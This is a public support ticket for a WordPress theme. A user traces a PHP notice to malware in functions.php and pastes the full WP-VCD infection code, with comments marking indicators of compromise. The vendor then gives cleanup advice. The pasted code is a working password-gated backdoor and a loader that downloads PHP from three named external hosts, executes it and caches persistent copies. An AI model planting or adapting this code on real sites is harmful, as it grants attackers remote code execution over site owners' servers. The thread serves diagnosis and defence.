  Public Ticket #2011245
Use of undefined constant REQUEST_URI
Closed

Comments

  • Marcos started the conversation

    I'm getting all the time the following error: Notice: Use of undefined constant REQUEST_URI - assumed 'REQUEST_URI' in /home/troca546/public_html/segredosdosonho.com.br/wp-content/themes/reco/functions.php on line 80

    line 80 contains this code: $path = $_SERVER['HTTP_HOST'] . $_SERVER[REQUEST_URI];

    What is going on ?

  •  184
    Estudio replied

    That code is not part of the theme.

    Here is the original line nº 80 from reco/functions.php http://prntscr.com/noo00h

    Also, we are not using $_SERVER variables, because WordPress already solves that with the get_template_directory_uri() and get_template_directory() functions, as you can see at the top of that file: http://prntscr.com/noo0ci

    Check whether any of your plugins is generating the error; it is also a good idea to check whether the functions.php file was edited from an external source (you can download the original file from your Themeforest account to compare).

  • Marcos replied

    I discovered that this is a virus. The strange thing is that only this file in your theme is affected, not the others. Here is the complete code:

    // Remote-control entry point. Any request that carries `action` together with a `password`
    // equal to the hard-coded 32-hex-character token below is handled here and never reaches
    // normal theme code (see the die("") at the end). The comparison is loose (`==`).
    // Detection hint: grep theme/plugin PHP for this token and for the `wp_vcd` marker.
    if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == '854785564679e57fd8816b221e41bb5a'))
    {
    $div_code_name="wp_vcd";
    switch ($_REQUEST['action'])
    {

    // `case ...;` (semicolon instead of colon) is valid PHP case-label syntax.
    // 'change_domain': rewrites THIS file (__FILE__). It locates the host inside the
    // `$tmpcontent = @file_get_contents("http://<host>/code.php` line further down and
    // replaces it with the attacker-supplied `newdomain`, then prints "true".
    // Because the file edits itself, its on-disk hash differs between infected sites.
    case 'change_domain';
    if (isset($_REQUEST['newdomain']))
    {

    if (!empty($_REQUEST['newdomain']))
    {
                                                                               if ($file = @file_get_contents(__FILE__))
                                                                        {
                                                                                                     if(preg_match_all('/\$tmpcontent = @file_get_contents\("http:\/\/(.*)\/code\.php/i',$file,$matcholddomain))
                                                                                                                 {

                                                                               $file = preg_replace('/'.$matcholddomain[1][0].'/i',$_REQUEST['newdomain'], $file);
                                                                               @file_put_contents(__FILE__, $file);
                               print "true";
                                                                                                                 }

                                                                        }
    }
    }
    break;

    // 'change_code': replaces everything between the `//$start_wp_theme_tmp` and
    // `//$end_wp_theme_tmp` markers in THIS file with the attacker-supplied `newcode`
    // (stripslashes() applied), i.e. the injected block can be swapped out remotely.
    // Those two marker comments are a reliable string to scan for.
    case 'change_code';
    if (isset($_REQUEST['newcode']))
    {

    if (!empty($_REQUEST['newcode']))
    {
                                                                               if ($file = @file_get_contents(__FILE__))
                                                                        {
                                                                                                     if(preg_match_all('/\/\/\$start_wp_theme_tmp([\s\S]*)\/\/\$end_wp_theme_tmp/i',$file,$matcholdcode))
                                                                                                                 {

                                                                               $file = str_replace($matcholdcode[1][0], stripslashes($_REQUEST['newcode']), $file);
                                                                               @file_put_contents(__FILE__, $file);
                               print "true";
                                                                                                                 }

                                                                        }
    }
    }
    break;

    // Unknown action: this literal response string is another indicator for web-log searches.
    default: print "ERROR_WP_ACTION WP_V_CD WP_CD";
    }

    // Stops the request here, so a controlled request never renders the site.
    die("");
    }

    // Downloader / loader stage, executed on every page load of the theme (functions.php).
    // `$div_code_name` ("wp_vcd") is the family marker; `$funcfile` and `$path` below are
    // assigned but not used anywhere in the visible code.
    $div_code_name = "wp_vcd";
    $funcfile      = __FILE__;
    if(!function_exists('theme_temp_setup')) {
        // Source of the reported notice: REQUEST_URI is unquoted, so PHP treats it as an
        // undefined constant and falls back to the string 'REQUEST_URI'.
        $path = $_SERVER['HTTP_HOST'] . $_SERVER[REQUEST_URI];
        // Skips cron and XML-RPC requests. Note the loose `== false`, which also matches
        // a match at offset 0.
        if (stripos($_SERVER['REQUEST_URI'], 'wp-cron.php') == false && stripos($_SERVER['REQUEST_URI'], 'xmlrpc.php') == false) {
            
            // cURL fetch that follows redirects and returns the body (false on failure).
            // Used below as the fallback when file_get_contents() on the URL fails.
            function file_get_contents_tcurl($url)
            {
                $ch = curl_init();
                curl_setopt($ch, CURLOPT_AUTOREFERER, TRUE);
                curl_setopt($ch, CURLOPT_HEADER, 0);
                curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
                curl_setopt($ch, CURLOPT_URL, $url);
                curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE);
                $data = curl_exec($ch);
                curl_close($ch);
                return $data;
            }
            
            // Executes arbitrary PHP source: writes "<?php\n" . $phpCode to a temp file,
            // include()s it (which runs it), deletes the file, and returns get_defined_vars()
            // so the caller's extract() pulls the payload's variables into this scope.
            // If the write into sys_get_temp_dir() fails it retries in the current directory.
            // The temp file (prefix "theme_temp_setup") exists only briefly — a short-lived
            // artifact worth alerting on with file-creation monitoring.
            function theme_temp_setup($phpCode)
            {
                $tmpfname = tempnam(sys_get_temp_dir(), "theme_temp_setup");
                $handle   = fopen($tmpfname, "w+");
               if( fwrite($handle, "<?php\n" . $phpCode))
       {
       }
    else
    {
    $tmpfname = tempnam('./', "theme_temp_setup");
                $handle   = fopen($tmpfname, "w+");
    fwrite($handle, "<?php\n" . $phpCode);
    }
    fclose($handle);
                include $tmpfname;
                unlink($tmpfname);
                return get_defined_vars();
            }
            

    // Marker the fetched payload must contain before it is executed; also a good
    // detection string for cached copies of the payload on disk.
    $wp_auth_key='3141695589e0e8d9d18fb3d75b5cf774';
            // Primary download host (IoC for DNS/egress logs): www.harors.com.
            // `@` suppresses any fetch errors so nothing shows up in the PHP error log.
            if (($tmpcontent = @file_get_contents("http://www.harors.com/code.php") OR $tmpcontent = @file_get_contents_tcurl("http://www.harors.com/code.php")) AND stripos($tmpcontent, $wp_auth_key) !== false) {

                // Redundant re-check of the marker, then execute and cache the payload.
                if (stripos($tmpcontent, $wp_auth_key) !== false) {
                    extract(theme_temp_setup($tmpcontent));
                    // Persistence: cache to wp-includes/wp-tmp.php (not a WordPress core file),
                    // falling back to the theme directory, then the current working directory.
                    @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);
                    
                    if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
                        @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
                        if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
                            @file_put_contents('wp-tmp.php', $tmpcontent);
                        }
                    }
                    
                }
            }
            
            
            // Second download host (IoC): www.harors.pw. Same execute-and-cache logic.
            elseif ($tmpcontent = @file_get_contents("http://www.harors.pw/code.php")  AND stripos($tmpcontent, $wp_auth_key) !== false ) {

    if (stripos($tmpcontent, $wp_auth_key) !== false) {
                    extract(theme_temp_setup($tmpcontent));
                    @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);
                    
                    if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
                        @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
                        if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
                            @file_put_contents('wp-tmp.php', $tmpcontent);
                        }
                    }
                    
                }
            } 

            // Third download host (IoC): www.harors.top. Same execute-and-cache logic.
            elseif ($tmpcontent = @file_get_contents("http://www.harors.top/code.php")  AND stripos($tmpcontent, $wp_auth_key) !== false ) {

    if (stripos($tmpcontent, $wp_auth_key) !== false) {
                    extract(theme_temp_setup($tmpcontent));
                    @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);
                    
                    if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
                        @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
                        if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
                            @file_put_contents('wp-tmp.php', $tmpcontent);
                        }
                    }
                    
                }
            }
    // Offline fallback: if no host could be reached, execute whichever cached copy
    // (wp-includes, theme directory, cwd) still carries the marker. Cleaning the
    // theme file alone therefore does not remove the infection — these must go too.
    elseif ($tmpcontent = @file_get_contents(ABSPATH . 'wp-includes/wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
                extract(theme_temp_setup($tmpcontent));
               
            } elseif ($tmpcontent = @file_get_contents(get_template_directory() . '/wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
                extract(theme_temp_setup($tmpcontent)); 

            } elseif ($tmpcontent = @file_get_contents('wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
                extract(theme_temp_setup($tmpcontent)); 

            } 
            
            
            
            
            
        }
    }

    por que isso está acontecendo apenas no template de vocês ?

  •  184
    Estudio replied

    In that case I recommend that you download the theme again from your Themeforest account and reinstall it.

    We followed all WordPress and Envato standards, so it is something related to your hosting account.

    When you are attacked by a virus, it can be related to a plugin, an outdated WordPress core, or a security breach at the hosting provider.

    If your website is not secure enough, it is recommended to install a security plugin like WP Defender or Sucuri and run a full scan of your hosting; you will probably find the virus file on your FTP if you do a quick search.

    The best option is to contact your hosting provider and explain your current situation; they can probably run a full scan and clean your whole website.

  • Marcos replied

    I identified the problem clearly. Before buying the template I downloaded one from the internet to see what it was like, and that theme infected my entire database. I installed a plugin that scanned, identified the malware and removed it. Now everything is ok.

    Thank you

  •  184
    Estudio replied

    Perfect! Keep that scanner plugin installed and change your FTP / admin credentials.

    Once you have been attacked, it is common for some external files (outside your main WP installation) to be affected too, so it is always good to do a full check of your public_html folder.

    You probably know it, but if you install a theme from an untrusted source (nulled themes or similar) there is a high risk of getting a virus and losing all your information.

    Going to close this ticket then.